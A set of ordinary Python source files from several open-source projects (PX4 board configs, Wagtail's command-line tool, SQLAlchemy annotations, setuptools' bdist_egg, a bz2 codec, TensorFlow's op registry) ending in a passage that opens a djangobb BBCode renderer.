exclude): self.ROMFS_EXCLUDE += exclude class px4_v1(px4): name = 'px4-v1' def __init__(self): super(px4_v1, self).__init__() self.bootloader_name = 'px4fmu_bl.bin' self.board_name = 'px4fmu-v1' self.px4io_name = 'px4io-v1' self.romfs_exclude(['oreoled.bin']) class px4_v2(px4): name = 'px4-v2' def __init__(self): super(px4_v2, self).__init__() self.bootloader_name = 'px4fmuv2_bl.bin' self.board_name = 'px4fmu-v2' self.px4io_name = 'px4io-v2' self.romfs_exclude(['oreoled.bin']) self.with_uavcan = True class px4_v3(px4): name = 'px4-v3' def __init__(self): super(px4_v3, self).__init__() self.bootloader_name = 'px4fmuv2_bl.bin' self.board_name = 'px4fmu-v3' self.px4io_name = 'px4io-v2' 
self.with_uavcan = True class px4_v4(px4): name = 'px4-v4' def __init__(self): super(px4_v4, self).__init__() self.bootloader_name = 'px4fmuv4_bl.bin' self.board_name = 'px4fmu-v4' self.romfs_exclude(['oreoled.bin']) self.with_uavcan = True class aerofc_v1(px4): name = 'aerofc-v1' def __init__(self): super(aerofc_v1, self).__init__() self.bootloader_name = 'aerofcv1_bl.bin' self.board_name = 'aerofc-v1' self.romfs_exclude(['oreoled.bin']) self.board_rc = True
zerolab/wagtail
refs/heads/main
wagtail/bin/wagtail.py
6
#!/usr/bin/env python import fileinput import fnmatch import os import re import sys from argparse import ArgumentParser from difflib import unified_diff from django.core.management import ManagementUtility CURRENT_PYTHON = sys.version_info[:2] REQUIRED_PYTHON = (3, 5) if CURRENT_PYTHON < REQUIRED_PYTHON: sys.stderr.write("This version of Wagtail requires Python {}.{} or above - you are running {}.{}\n".format(*(REQUIRED_PYTHON + CURRENT_PYTHON))) sys.exit(1) def pluralize(value, arg='s'): return '' if value == 1 else arg class Command: description = None def create_parser(self, command_name=None): if command_name is None: prog = None else: # hack the prog name as reported to ArgumentParser to include the command prog = "%s %s" % (prog_name(), command_name) parser = ArgumentParser( description=getattr(self, 'description', None), add_help=False, prog=prog ) self.add_arguments(parser) return parser def add_arguments(self, parser): pass def print_help(self, command_name): parser = self.create_parser(command_name=command_name) parser.print_help() def execute(self, argv): parser = self.create_parser() options = parser.parse_args(sys.argv[2:]) options_dict = vars(options) self.run(**options_dict) class CreateProject(Command): description = "Creates the directory structure for a new Wagtail project." def add_arguments(self, parser): parser.add_argument('project_name', help="Name for your Wagtail project") parser.add_argument('dest_dir', nargs='?', help="Destination directory inside which to create the project") def run(self, project_name=None, dest_dir=None): # Make sure given name is not already in use by another python package/module. try: __import__(project_name) except ImportError: pass else: sys.exit("'%s' conflicts with the name of an existing " "Python module and cannot be used as a project " "name. Please try another name." 
% project_name) print("Creating a Wagtail project called %(project_name)s" % {'project_name': project_name}) # noqa # Create the project from the Wagtail template using startapp # First find the path to Wagtail import wagtail wagtail_path = os.path.dirname(wagtail.__file__) template_path = os.path.join(wagtail_path, 'project_template') # Call django-admin startproject utility_args = ['django-admin', 'startproject', '--template=' + template_path, '--ext=html,rst', '--name=Dockerfile', project_name] if dest_dir: utility_args.append(dest_dir) utility = ManagementUtility(utility_args) utility.execute() print("Success! %(project_name)s has been created" % {'project_name': project_name}) # noqa class UpdateModulePaths(Command): description = "Update a Wagtail project tree to use Wagtail 2.x module paths" REPLACEMENTS = [ (re.compile(r'\bwagtail\.wagtailcore\b'), 'wagtail.core'), (re.compile(r'\bwagtail\.wagtailadmin\b'), 'wagtail.admin'), (re.compile(r'\bwagtail\.wagtaildocs\b'), 'wagtail.documents'), (re.compile(r'\bwagtail\.wagtailembeds\b'), 'wagtail.embeds'), (re.compile(r'\bwagtail\.wagtailimages\b'), 'wagtail.images'), (re.compile(r'\bwagtail\.wagtailsearch\b'), 'wagtail.search'), (re.compile(r'\bwagtail\.wagtailsites\b'), 'wagtail.sites'), (re.compile(r'\bwagtail\.wagtailsnippets\b'), 'wagtail.snippets'), (re.compile(r'\bwagtail\.wagtailusers\b'), 'wagtail.users'), (re.compile(r'\bwagtail\.wagtailforms\b'), 'wagtail.contrib.forms'), (re.compile(r'\bwagtail\.wagtailredirects\b'), 'wagtail.contrib.redirects'), (re.compile(r'\bwagtail\.contrib\.wagtailfrontendcache\b'), 'wagtail.contrib.frontend_cache'), (re.compile(r'\bwagtail\.contrib\.wagtailroutablepage\b'), 'wagtail.contrib.routable_page'), (re.compile(r'\bwagtail\.contrib\.wagtailsearchpromotions\b'), 'wagtail.contrib.search_promotions'), (re.compile(r'\bwagtail\.contrib\.wagtailsitemaps\b'), 'wagtail.contrib.sitemaps'), (re.compile(r'\bwagtail\.contrib\.wagtailstyleguide\b'), 'wagtail.contrib.styleguide'), ] 
def add_arguments(self, parser): parser.add_argument('root_path', nargs='?', help="Path to your project's root") parser.add_argument('--list', action='store_true', dest='list_files', help="Show the list of files to change, without modifying them") parser.add_argument('--diff', action='store_true', help="Show the changes that would be made, without modifying the files") parser.add_argument( '--ignore-dir', action='append', dest='ignored_dirs', metavar='NAME', help="Ignore files in this directory" ) parser.add_argument( '--ignore-file', action='append', dest='ignored_patterns', metavar='NAME', help="Ignore files with this name (supports wildcards)" ) def run(self, root_path=None, list_files=False, diff=False, ignored_dirs=None, ignored_patterns=None): if root_path is None: root_path = os.getcwd() absolute_ignored_dirs = [ os.path.abspath(dir_path) + os.sep for dir_path in (ignored_dirs or []) ] if ignored_patterns is None: ignored_patterns = [] checked_file_count = 0 changed_file_count = 0 for (dirpath, dirnames, filenames) in os.walk(root_path): dirpath_with_slash = os.path.abspath(dirpath) + os.sep if any(dirpath_with_slash.startswith(ignored_dir) for ignored_dir in absolute_ignored_dirs): continue for filename in filenames: if not filename.lower().endswith('.py'): continue if any(fnmatch.fnmatch(filename, pattern) for pattern in ignored_patterns): continue path = os.path.join(dirpath, filename) relative_path = os.path.relpath(path, start=root_path) checked_file_count += 1 if diff: change_count = self._show_diff(path, relative_path=relative_path) else: if list_files: change_count = self._count_changes(path) else: # actually update change_count = self._rewrite_file(path) if change_count: print("%s - %d change%s" % (relative_path, change_count, pluralize(change_count))) # NOQA if change_count: changed_file_count += 1 if diff or list_files: print( "\nChecked %d .py file%s, %d file%s to update." 
% ( checked_file_count, pluralize(checked_file_count), changed_file_count, pluralize(changed_file_count) ) ) # NOQA else: print( "\nChecked %d .py file%s, %d file%s updated." % ( checked_file_count, pluralize(checked_file_count), changed_file_count, pluralize(changed_file_count) ) ) # NOQA def _rewrite_line(self, line): for pattern, repl in self.REPLACEMENTS: line = re.sub(pattern, repl, line) return line def _show_diff(self, filename, relative_path=None): change_count = 0 original = [] updated = [] with open(filename) as f: for original_line in f: original.append(original_line) line = self._rewrite_line(original_line) updated.append(line) if line != original_line: change_count += 1 if change_count: relative_path = relative_path or filename sys.stdout.writelines(unified_diff( original, updated, fromfile="%s:before" % relative_path, tofile="%s:after" % relative_path )) return change_count def _count_changes(self, filename): change_count = 0 with open(filename) as f: for original_line in f: line = self._rewrite_line(original_line) if line != original_line: change_count += 1 return change_count def _rewrite_file(self, filename): change_count = 0 with fileinput.FileInput(filename, inplace=True) as f: for original_line in f: line = self._rewrite_line(original_line) print(line, end='') # NOQA if line != original_line: change_count += 1 return change_count class Version(Command): description = "List which version of Wagtail you are using" def run(self): import wagtail version = wagtail.get_version(wagtail.VERSION) print("You are using Wagtail %(version)s" % {'version': version}) COMMANDS = { 'start': CreateProject(), 'updatemodulepaths': UpdateModulePaths(), '--version': Version() } def prog_name(): return os.path.basename(sys.argv[0]) def help_index(): print("Type '%s help <subcommand>' for help on a specific subcommand.\n" % prog_name()) # NOQA print("Available subcommands:\n") # NOQA for name, cmd in sorted(COMMANDS.items()): print(" %s%s" % (name.ljust(20), 
cmd.description)) # NOQA def unknown_command(command): print("Unknown command: '%s'" % command) # NOQA print("Type '%s help' for usage." % prog_name()) # NOQA sys.exit(1) def main(): try: command_name = sys.argv[1] except IndexError: help_index() return if command_name == 'help': try: help_command_name = sys.argv[2] except IndexError: help_index() return try: command = COMMANDS[help_command_name] except KeyError: unknown_command(help_command_name) return command.print_help(help_command_name) return try: command = COMMANDS[command_name] except KeyError: unknown_command(command_name) return command.execute(sys.argv) if __name__ == "__main__": main()
arante/pyloc
refs/heads/master
microblog/flask/lib/python3.5/site-packages/sqlalchemy/sql/annotation.py
23
# sql/annotation.py # Copyright (C) 2005-2017 the SQLAlchemy authors and contributors # <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """The :class:`.Annotated` class and related routines; creates hash-equivalent copies of SQL constructs which contain context-specific markers and associations. """ from .. import util from . import operators class Annotated(object): """clones a ClauseElement and applies an 'annotations' dictionary. Unlike regular clones, this clone also mimics __hash__() and __cmp__() of the original element so that it takes its place in hashed collections. A reference to the original element is maintained, for the important reason of keeping its hash value current. When GC'ed, the hash value may be reused, causing conflicts. .. note:: The rationale for Annotated producing a brand new class, rather than placing the functionality directly within ClauseElement, is **performance**. The __hash__() method is absent on plain ClauseElement which leads to significantly reduced function call overhead, as the use of sets and dictionaries against ClauseElement objects is prevalent, but most are not "annotated". 
""" def __new__(cls, *args): if not args: # clone constructor return object.__new__(cls) else: element, values = args # pull appropriate subclass from registry of annotated # classes try: cls = annotated_classes[element.__class__] except KeyError: cls = _new_annotation_type(element.__class__, cls) return object.__new__(cls) def __init__(self, element, values): self.__dict__ = element.__dict__.copy() self.__element = element self._annotations = values self._hash = hash(element) def _annotate(self, values): _values = self._annotations.copy() _values.update(values) return self._with_annotations(_values) def _with_annotations(self, values): clone = self.__class__.__new__(self.__class__) clone.__dict__ = self.__dict__.copy() clone._annotations = values return clone def _deannotate(self, values=None, clone=True): if values is None: return self.__element else: _values = self._annotations.copy() for v in values: _values.pop(v, None) return self._with_annotations(_values) def _compiler_dispatch(self, visitor, **kw): return self.__element.__class__._compiler_dispatch( self, visitor, **kw) @property def _constructor(self): return self.__element._constructor def _clone(self): clone = self.__element._clone() if clone is self.__element: # detect immutable, don't change anything return self else: # update the clone with any changes that have occurred # to this object's __dict__. clone.__dict__.update(self.__dict__) return self.__class__(clone, self._annotations) def __hash__(self): return self._hash def __eq__(self, other): if isinstance(self.__element, operators.ColumnOperators): return self.__element.__class__.__eq__(self, other) else: return hash(other) == hash(self) # hard-generate Annotated subclasses. this technique # is used instead of on-the-fly types (i.e. type.__new__()) # so that the resulting objects are pickleable. 
annotated_classes = {} def _deep_annotate(element, annotations, exclude=None): """Deep copy the given ClauseElement, annotating each element with the given annotations dictionary. Elements within the exclude collection will be cloned but not annotated. """ def clone(elem): if exclude and \ hasattr(elem, 'proxy_set') and \ elem.proxy_set.intersection(exclude): newelem = elem._clone() elif annotations != elem._annotations: newelem = elem._annotate(annotations) else: newelem = elem newelem._copy_internals(clone=clone) return newelem if element is not None: element = clone(element) return element def _deep_deannotate(element, values=None): """Deep copy the given element, removing annotations.""" cloned = util.column_dict() def clone(elem): # if a values dict is given, # the elem must be cloned each time it appears, # as there may be different annotations in source # elements that are remaining. if totally # removing all annotations, can assume the same # slate... if values or elem not in cloned: newelem = elem._deannotate(values=values, clone=True) newelem._copy_internals(clone=clone) if not values: cloned[elem] = newelem return newelem else: return cloned[elem] if element is not None: element = clone(element) return element def _shallow_annotate(element, annotations): """Annotate the given ClauseElement and copy its internals so that internal objects refer to the new annotated object. Basically used to apply a "dont traverse" annotation to a selectable, without digging throughout the whole structure wasting time. """ element = element._annotate(annotations) element._copy_internals() return element def _new_annotation_type(cls, base_cls): if issubclass(cls, Annotated): return cls elif cls in annotated_classes: return annotated_classes[cls] for super_ in cls.__mro__: # check if an Annotated subclass more specific than # the given base_cls is already registered, such # as AnnotatedColumnElement. 
if super_ in annotated_classes: base_cls = annotated_classes[super_] break annotated_classes[cls] = anno_cls = type( "Annotated%s" % cls.__name__, (base_cls, cls), {}) globals()["Annotated%s" % cls.__name__] = anno_cls return anno_cls def _prepare_annotations(target_hierarchy, base_cls): stack = [target_hierarchy] while stack: cls = stack.pop() stack.extend(cls.__subclasses__()) _new_annotation_type(cls, base_cls)
havard024/prego
refs/heads/master
venv/lib/python2.7/site-packages/setuptools/command/bdist_egg.py
286
"""setuptools.command.bdist_egg Build .egg distributions""" # This module should be kept compatible with Python 2.3 import sys, os, marshal from setuptools import Command from distutils.dir_util import remove_tree, mkpath try: # Python 2.7 or >=3.2 from sysconfig import get_path, get_python_version def _get_purelib(): return get_path("purelib") except ImportError: from distutils.sysconfig import get_python_lib, get_python_version def _get_purelib(): return get_python_lib(False) from distutils import log from distutils.errors import DistutilsSetupError from pkg_resources import get_build_platform, Distribution, ensure_directory from pkg_resources import EntryPoint from types import CodeType from setuptools.compat import basestring, next from setuptools.extension import Library def strip_module(filename): if '.' in filename: filename = os.path.splitext(filename)[0] if filename.endswith('module'): filename = filename[:-6] return filename def write_stub(resource, pyfile): f = open(pyfile,'w') f.write('\n'.join([ "def __bootstrap__():", " global __bootstrap__, __loader__, __file__", " import sys, pkg_resources, imp", " __file__ = pkg_resources.resource_filename(__name__,%r)" % resource, " __loader__ = None; del __bootstrap__, __loader__", " imp.load_dynamic(__name__,__file__)", "__bootstrap__()", "" # terminal \n ])) f.close() # stub __init__.py for packages distributed without one NS_PKG_STUB = '__import__("pkg_resources").declare_namespace(__name__)' class bdist_egg(Command): description = "create an \"egg\" distribution" user_options = [ ('bdist-dir=', 'b', "temporary directory for creating the distribution"), ('plat-name=', 'p', "platform name to embed in generated filenames " "(default: %s)" % get_build_platform()), ('exclude-source-files', None, "remove all .py files from the generated egg"), ('keep-temp', 'k', "keep the pseudo-installation tree around after " + "creating the distribution archive"), ('dist-dir=', 'd', "directory to put final built distributions 
in"), ('skip-build', None, "skip rebuilding everything (for testing/debugging)"), ] boolean_options = [ 'keep-temp', 'skip-build', 'exclude-source-files' ] def initialize_options (self): self.bdist_dir = None self.plat_name = None self.keep_temp = 0 self.dist_dir = None self.skip_build = 0 self.egg_output = None self.exclude_source_files = None def finalize_options(self): ei_cmd = self.ei_cmd = self.get_finalized_command("egg_info") self.egg_info = ei_cmd.egg_info if self.bdist_dir is None: bdist_base = self.get_finalized_command('bdist').bdist_base self.bdist_dir = os.path.join(bdist_base, 'egg') if self.plat_name is None: self.plat_name = get_build_platform() self.set_undefined_options('bdist',('dist_dir', 'dist_dir')) if self.egg_output is None: # Compute filename of the output egg basename = Distribution( None, None, ei_cmd.egg_name, ei_cmd.egg_version, get_python_version(), self.distribution.has_ext_modules() and self.plat_name ).egg_name() self.egg_output = os.path.join(self.dist_dir, basename+'.egg') def do_install_data(self): # Hack for packages that install data to install's --install-lib self.get_finalized_command('install').install_lib = self.bdist_dir site_packages = os.path.normcase(os.path.realpath(_get_purelib())) old, self.distribution.data_files = self.distribution.data_files,[] for item in old: if isinstance(item,tuple) and len(item)==2: if os.path.isabs(item[0]): realpath = os.path.realpath(item[0]) normalized = os.path.normcase(realpath) if normalized==site_packages or normalized.startswith( site_packages+os.sep ): item = realpath[len(site_packages)+1:], item[1] # XXX else: raise ??? 
self.distribution.data_files.append(item) try: log.info("installing package data to %s" % self.bdist_dir) self.call_command('install_data', force=0, root=None) finally: self.distribution.data_files = old def get_outputs(self): return [self.egg_output] def call_command(self,cmdname,**kw): """Invoke reinitialized command `cmdname` with keyword args""" for dirname in INSTALL_DIRECTORY_ATTRS: kw.setdefault(dirname,self.bdist_dir) kw.setdefault('skip_build',self.skip_build) kw.setdefault('dry_run', self.dry_run) cmd = self.reinitialize_command(cmdname, **kw) self.run_command(cmdname) return cmd def run(self): # Generate metadata first self.run_command("egg_info") # We run install_lib before install_data, because some data hacks # pull their data path from the install_lib command. log.info("installing library code to %s" % self.bdist_dir) instcmd = self.get_finalized_command('install') old_root = instcmd.root; instcmd.root = None if self.distribution.has_c_libraries() and not self.skip_build: self.run_command('build_clib') cmd = self.call_command('install_lib', warn_dir=0) instcmd.root = old_root all_outputs, ext_outputs = self.get_ext_outputs() self.stubs = [] to_compile = [] for (p,ext_name) in enumerate(ext_outputs): filename,ext = os.path.splitext(ext_name) pyfile = os.path.join(self.bdist_dir, strip_module(filename)+'.py') self.stubs.append(pyfile) log.info("creating stub loader for %s" % ext_name) if not self.dry_run: write_stub(os.path.basename(ext_name), pyfile) to_compile.append(pyfile) ext_outputs[p] = ext_name.replace(os.sep,'/') to_compile.extend(self.make_init_files()) if to_compile: cmd.byte_compile(to_compile) if self.distribution.data_files: self.do_install_data() # Make the EGG-INFO directory archive_root = self.bdist_dir egg_info = os.path.join(archive_root,'EGG-INFO') self.mkpath(egg_info) if self.distribution.scripts: script_dir = os.path.join(egg_info, 'scripts') log.info("installing scripts to %s" % script_dir) 
self.call_command('install_scripts',install_dir=script_dir,no_ep=1) self.copy_metadata_to(egg_info) native_libs = os.path.join(egg_info, "native_libs.txt") if all_outputs: log.info("writing %s" % native_libs) if not self.dry_run: ensure_directory(native_libs) libs_file = open(native_libs, 'wt') libs_file.write('\n'.join(all_outputs)) libs_file.write('\n') libs_file.close() elif os.path.isfile(native_libs): log.info("removing %s" % native_libs) if not self.dry_run: os.unlink(native_libs) write_safety_flag( os.path.join(archive_root,'EGG-INFO'), self.zip_safe() ) if os.path.exists(os.path.join(self.egg_info,'depends.txt')): log.warn( "WARNING: 'depends.txt' will not be used by setuptools 0.6!\n" "Use the install_requires/extras_require setup() args instead." ) if self.exclude_source_files: self.zap_pyfiles() # Make the archive make_zipfile(self.egg_output, archive_root, verbose=self.verbose, dry_run=self.dry_run, mode=self.gen_header()) if not self.keep_temp: remove_tree(self.bdist_dir, dry_run=self.dry_run) # Add to 'Distribution.dist_files' so that the "upload" command works getattr(self.distribution,'dist_files',[]).append( ('bdist_egg',get_python_version(),self.egg_output)) def zap_pyfiles(self): log.info("Removing .py files from temporary directory") for base,dirs,files in walk_egg(self.bdist_dir): for name in files: if name.endswith('.py'): path = os.path.join(base,name) log.debug("Deleting %s", path) os.unlink(path) def zip_safe(self): safe = getattr(self.distribution,'zip_safe',None) if safe is not None: return safe log.warn("zip_safe flag not set; analyzing archive contents...") return analyze_egg(self.bdist_dir, self.stubs) def make_init_files(self): """Create missing package __init__ files""" init_files = [] for base,dirs,files in walk_egg(self.bdist_dir): if base==self.bdist_dir: # don't put an __init__ in the root continue for name in files: if name.endswith('.py'): if '__init__.py' not in files: pkg = base[len(self.bdist_dir)+1:].replace(os.sep,'.') if 
self.distribution.has_contents_for(pkg): log.warn("Creating missing __init__.py for %s",pkg) filename = os.path.join(base,'__init__.py') if not self.dry_run: f = open(filename,'w'); f.write(NS_PKG_STUB) f.close() init_files.append(filename) break else: # not a package, don't traverse to subdirectories dirs[:] = [] return init_files def gen_header(self): epm = EntryPoint.parse_map(self.distribution.entry_points or '') ep = epm.get('setuptools.installation',{}).get('eggsecutable') if ep is None: return 'w' # not an eggsecutable, do it the usual way. if not ep.attrs or ep.extras: raise DistutilsSetupError( "eggsecutable entry point (%r) cannot have 'extras' " "or refer to a module" % (ep,) ) pyver = sys.version[:3] pkg = ep.module_name full = '.'.join(ep.attrs) base = ep.attrs[0] basename = os.path.basename(self.egg_output) header = ( "#!/bin/sh\n" 'if [ `basename $0` = "%(basename)s" ]\n' 'then exec python%(pyver)s -c "' "import sys, os; sys.path.insert(0, os.path.abspath('$0')); " "from %(pkg)s import %(base)s; sys.exit(%(full)s())" '" "$@"\n' 'else\n' ' echo $0 is not the correct name for this egg file.\n' ' echo Please rename it back to %(basename)s and try again.\n' ' exec false\n' 'fi\n' ) % locals() if not self.dry_run: mkpath(os.path.dirname(self.egg_output), dry_run=self.dry_run) f = open(self.egg_output, 'w') f.write(header) f.close() return 'a' def copy_metadata_to(self, target_dir): "Copy metadata (egg info) to the target_dir" # normalize the path (so that a forward-slash in egg_info will # match using startswith below) norm_egg_info = os.path.normpath(self.egg_info) prefix = os.path.join(norm_egg_info,'') for path in self.ei_cmd.filelist.files: if path.startswith(prefix): target = os.path.join(target_dir, path[len(prefix):]) ensure_directory(target) self.copy_file(path, target) def get_ext_outputs(self): """Get a list of relative paths to C extensions in the output distro""" all_outputs = [] ext_outputs = [] paths = {self.bdist_dir:''} for base, dirs, 
files in os.walk(self.bdist_dir): for filename in files: if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS: all_outputs.append(paths[base]+filename) for filename in dirs: paths[os.path.join(base,filename)] = paths[base]+filename+'/' if self.distribution.has_ext_modules(): build_cmd = self.get_finalized_command('build_ext') for ext in build_cmd.extensions: if isinstance(ext,Library): continue fullname = build_cmd.get_ext_fullname(ext.name) filename = build_cmd.get_ext_filename(fullname) if not os.path.basename(filename).startswith('dl-'): if os.path.exists(os.path.join(self.bdist_dir,filename)): ext_outputs.append(filename) return all_outputs, ext_outputs NATIVE_EXTENSIONS = dict.fromkeys('.dll .so .dylib .pyd'.split()) def walk_egg(egg_dir): """Walk an unpacked egg's contents, skipping the metadata directory""" walker = os.walk(egg_dir) base,dirs,files = next(walker) if 'EGG-INFO' in dirs: dirs.remove('EGG-INFO') yield base,dirs,files for bdf in walker: yield bdf def analyze_egg(egg_dir, stubs): # check for existing flag in EGG-INFO for flag,fn in safety_flags.items(): if os.path.exists(os.path.join(egg_dir,'EGG-INFO',fn)): return flag if not can_scan(): return False safe = True for base, dirs, files in walk_egg(egg_dir): for name in files: if name.endswith('.py') or name.endswith('.pyw'): continue elif name.endswith('.pyc') or name.endswith('.pyo'): # always scan, even if we already know we're not safe safe = scan_module(egg_dir, base, name, stubs) and safe return safe def write_safety_flag(egg_dir, safe): # Write or remove zip safety flag file(s) for flag,fn in safety_flags.items(): fn = os.path.join(egg_dir, fn) if os.path.exists(fn): if safe is None or bool(safe) != flag: os.unlink(fn) elif safe is not None and bool(safe)==flag: f=open(fn,'wt'); f.write('\n'); f.close() safety_flags = { True: 'zip-safe', False: 'not-zip-safe', } def scan_module(egg_dir, base, name, stubs): """Check whether module possibly uses unsafe-for-zipfile stuff""" filename = 
os.path.join(base,name) if filename[:-1] in stubs: return True # Extension module pkg = base[len(egg_dir)+1:].replace(os.sep,'.') module = pkg+(pkg and '.' or '')+os.path.splitext(name)[0] if sys.version_info < (3, 3): skip = 8 # skip magic & date else: skip = 12 # skip magic & date & file size f = open(filename,'rb'); f.read(skip) code = marshal.load(f); f.close() safe = True symbols = dict.fromkeys(iter_symbols(code)) for bad in ['__file__', '__path__']: if bad in symbols: log.warn("%s: module references %s", module, bad) safe = False if 'inspect' in symbols: for bad in [ 'getsource', 'getabsfile', 'getsourcefile', 'getfile' 'getsourcelines', 'findsource', 'getcomments', 'getframeinfo', 'getinnerframes', 'getouterframes', 'stack', 'trace' ]: if bad in symbols: log.warn("%s: module MAY be using inspect.%s", module, bad) safe = False if '__name__' in symbols and '__main__' in symbols and '.' not in module: if sys.version[:3]=="2.4": # -m works w/zipfiles in 2.5 log.warn("%s: top-level module may be 'python -m' script", module) safe = False return safe def iter_symbols(code): """Yield names and strings used by `code` and its nested code objects""" for name in code.co_names: yield name for const in code.co_consts: if isinstance(const,basestring): yield const elif isinstance(const,CodeType): for name in iter_symbols(const): yield name def can_scan(): if not sys.platform.startswith('java') and sys.platform != 'cli': # CPython, PyPy, etc. 
return True log.warn("Unable to analyze compiled code on this platform.") log.warn("Please ask the author to include a 'zip_safe'" " setting (either True or False) in the package's setup.py") # Attribute names of options for commands that might need to be convinced to # install to the egg build directory INSTALL_DIRECTORY_ATTRS = [ 'install_lib', 'install_dir', 'install_data', 'install_base' ] def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=None, mode='w' ): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir)+1:] if not dry_run: z.write(path, p) log.debug("adding '%s'" % p) if compress is None: compress = (sys.version>="2.4") # avoid 2.3 zipimport bug when 64 bits compression = [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED][bool(compress)] if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename #
kenshay/ImageScript
refs/heads/master
ProgramData/SystemFiles/Python/Lib/encodings/bz2_codec.py
58
""" Python 'bz2_codec' Codec - bz2 compression encoding Unlike most of the other codecs which target Unicode, this codec will return Python string objects for both encode and decode. Adapted by Raymond Hettinger from zlib_codec.py which was written by Marc-Andre Lemburg (mal@lemburg.com). """ import codecs import bz2 # this codec needs the optional bz2 module ! ### Codec APIs def bz2_encode(input,errors='strict'): """ Encodes the object input and returns a tuple (output object, length consumed). errors defines the error handling to apply. It defaults to 'strict' handling which is the only currently supported error handling for this codec. """ assert errors == 'strict' output = bz2.compress(input) return (output, len(input)) def bz2_decode(input,errors='strict'): """ Decodes the object input and returns a tuple (output object, length consumed). input must be an object which provides the bf_getreadbuf buffer slot. Python strings, buffer objects and memory mapped files are examples of objects providing this slot. errors defines the error handling to apply. It defaults to 'strict' handling which is the only currently supported error handling for this codec. 
""" assert errors == 'strict' output = bz2.decompress(input) return (output, len(input)) class Codec(codecs.Codec): def encode(self, input, errors='strict'): return bz2_encode(input, errors) def decode(self, input, errors='strict'): return bz2_decode(input, errors) class IncrementalEncoder(codecs.IncrementalEncoder): def __init__(self, errors='strict'): assert errors == 'strict' self.errors = errors self.compressobj = bz2.BZ2Compressor() def encode(self, input, final=False): if final: c = self.compressobj.compress(input) return c + self.compressobj.flush() else: return self.compressobj.compress(input) def reset(self): self.compressobj = bz2.BZ2Compressor() class IncrementalDecoder(codecs.IncrementalDecoder): def __init__(self, errors='strict'): assert errors == 'strict' self.errors = errors self.decompressobj = bz2.BZ2Decompressor() def decode(self, input, final=False): try: return self.decompressobj.decompress(input) except EOFError: return '' def reset(self): self.decompressobj = bz2.BZ2Decompressor() class StreamWriter(Codec,codecs.StreamWriter): pass class StreamReader(Codec,codecs.StreamReader): pass ### encodings module API def getregentry(): return codecs.CodecInfo( name="bz2", encode=bz2_encode, decode=bz2_decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamwriter=StreamWriter, streamreader=StreamReader, _is_text_encoding=False, )
lukeiwanski/tensorflow
refs/heads/master
tensorflow/python/framework/op_def_registry.py
196
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global registry for OpDefs."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from tensorflow.core.framework import op_def_pb2

# Module-level store mapping op name -> op_def_pb2.OpDef.
_registered_ops = {}


def register_op_list(op_list):
  """Register all the ops in an op_def_pb2.OpList."""
  if not isinstance(op_list, op_def_pb2.OpList):
    raise TypeError("%s is %s, not an op_def_pb2.OpList" %
                    (op_list, type(op_list)))
  for op_def in op_list.op:
    previous = _registered_ops.get(op_def.name)
    if previous is None:
      _registered_ops[op_def.name] = op_def
    else:
      # Re-registering a name is tolerated only when the definition
      # is identical to the one already stored.
      assert previous == op_def


def get_registered_ops():
  """Returns a dictionary mapping names to OpDefs."""
  return _registered_ops
SBillion/aegroupware
refs/heads/master
modules/djangobb_forum/markups/bbmarkup.py
2
# BBCode -> HTML markup renderer for djangobb_forum.
import re

from django.conf import settings
from django.utils.html import escape
from django.template.defaultfilters import linebreaksbr
from django.utils.safestring import mark_safe

__all__ = ('BBCODE_RULES', 'bbcode')

#regexp for url validation from django URLField + added ftp:// and allowing spaces around
URL_RE = r'\s*((ftp|https?)://(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|'\
    'localhost|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})(?::\d+)?(?:/?|[/?]\S+))\s*'
#regexp for email from django + allowing spaces around
EMAIL_RE = r"""\s*(([-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*|^"""\
    """([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*")"""\
    """@(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?)\s*"""


def code_parser(matchobj):
    """
    Escaping bbcode and html tags between [code] tags.
    """
    value = matchobj.group(1)
    # Neutralize bracket characters so nested BBCode inside [code]
    # is displayed literally instead of being parsed by later rules.
    value = value.replace('[', '&#91;')
    value = value.replace(']', '&#93;')
    # Undo the <br /> insertion done by linebreaksbr before this rule runs.
    value = value.replace('<br />', '\n')
    return "<pre><code>%s</code></pre>" % value


"""
BBcode rule format:
'pattern' and 'repl'' - params for re.sub(); 'repl' can be function
'sortkey' - used to sort rules from highest to lowest; default value: 0
'nested' - show how many time tag can be nested to itself; only for [quote] now
"""
# NOTE: the [code] rule carries sortkey 100 so it is applied first, before any
# other tag can rewrite the code block's contents.
BBCODE_RULES = [
    {'pattern': r'\[code\](.*?)\[/code\]', 'repl': code_parser, 'sortkey': 100},
    {'pattern': r'\[url\]%s\[/url\]' % URL_RE, 'repl': r'<a href="\1">\1</a>'},
